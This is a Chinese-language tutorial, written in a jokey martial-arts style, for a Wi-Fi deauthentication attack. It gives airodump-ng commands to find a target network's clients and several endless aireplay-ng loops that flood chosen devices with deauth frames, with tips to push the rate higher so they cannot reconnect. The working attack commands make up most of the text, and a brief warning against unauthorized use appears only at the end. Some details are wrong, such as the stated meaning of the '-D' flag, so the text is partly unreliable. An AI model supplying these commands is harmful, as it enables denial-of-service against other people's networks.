WAPR天阶大法之wifi爆破(100%暴击攻击)

(1):续监听目标 WiFi并获取客户端MAC

执行以下命令,让 wlan0mon 固定在信道 XXX 并持续监听目标 WiFi

airodump-ng -c 信号道(例如149) --bssid WiFi的MAC (例如AA:BB:CC:DD:EE:FF) wlan0mon

用上述指令捕获到的 客户端 MAC 地址为 AA:BB:CC:DD:EE:FF

(2):天阶大法使用教程

第一步:(新建窗口)

第二步:造天攻击口诀

方法一:
执行定向 DeAuth 攻击
假设从上述命令中捕获到的客户端 MAC 地址为 AA:BB:CC:DD:EE:FF,在之前运行攻击循环命令的终端窗口(若之前的循环命令已停止,重新执行),将命令修改为:

bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c AA:BB:CC:DD:EE:FF -0 5 wlan0mon
sleep 0.03
done

-c AA:BB:CC:DD:EE:FF:指定要攻击的客户端 MAC 地址,实现定向攻击,相比广播攻击,定向攻击对现代设备的效果更好,更易让设备断网。
执行后,观察被攻击设备(对应 AA:BB:CC:DD:EE:FF MAC 地址的设备)的网络连接状态,正常情况下会出现断网、重连的现象。
如果执行后仍未断网,还可以尝试以下操作:
缩短 sleep 时间,如改为 sleep 0.01,增加攻击频率,但要注意不要让网卡过载。
检查目标设备是否支持 5GHz 网络,若目标设备只支持 2.4GHz 网络,而攻击的是 5GHz 信道的网络,设备也无法收到攻击信号导致断网失败。

(列如):

  1. 选择其中一台设备进行攻击(以F0:20:FF:67:16:8C为例)
    在之前运行攻击循环命令的终端窗口,将命令修改为:

bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 5 wlan0mon
sleep 0.03
done

-c A1:B1:C1:D1:E1:F1:指定攻击该 MAC 地址的设备,实现定向攻击。

第三步:观察敌人灵力情况

  1. 观察设备网络状态
    执行命令后,查看对应设备(如手机、电脑等,MAC 为F0:20:FF:67:16:8C的设备)的网络连接情况,正常会出现断网、重连的现象。
    3. 若对该设备攻击无效,可换另一台设备(A1:B1:C1:D1:E1:F1)
    修改命令为:

第四步:强化造天攻击口诀

bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 5 wlan0mon
sleep 0.03
done

(3)永无葬身乾坤大法

方法二:突击大法

  1. 更换 DeAuth 帧类型(突破帧验证)
    默认发送的是 “代码 7”(code 7)的 DeAuth 帧,部分设备对其过滤严格,可尝试发送 “代码 1”(更接近正常断开场景的帧):

bash
while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 5 -D wlan0mon # -D 表示发送代码1的帧
sleep 0.02
done

  1. 降低攻击间隔至极限(但需警惕网卡过载)
    将间隔缩短至 0.01 秒(每秒 100 帧),用密集流量淹没设备的重连机制:

while true; do
aireplay-ng -a AA:BB:CC:DD:EE:FF -c A1:B1:C1:D1:E1:F1 -0 10 wlan0mon # 一次发10帧
sleep 0.01
done

同样观察该设备的网络连接状态

不要攻击未经允许的wifi,违法的!

注意:

日后惹出祸来不要提为师名讳,否则永远逐出师门!!!!!!!!!!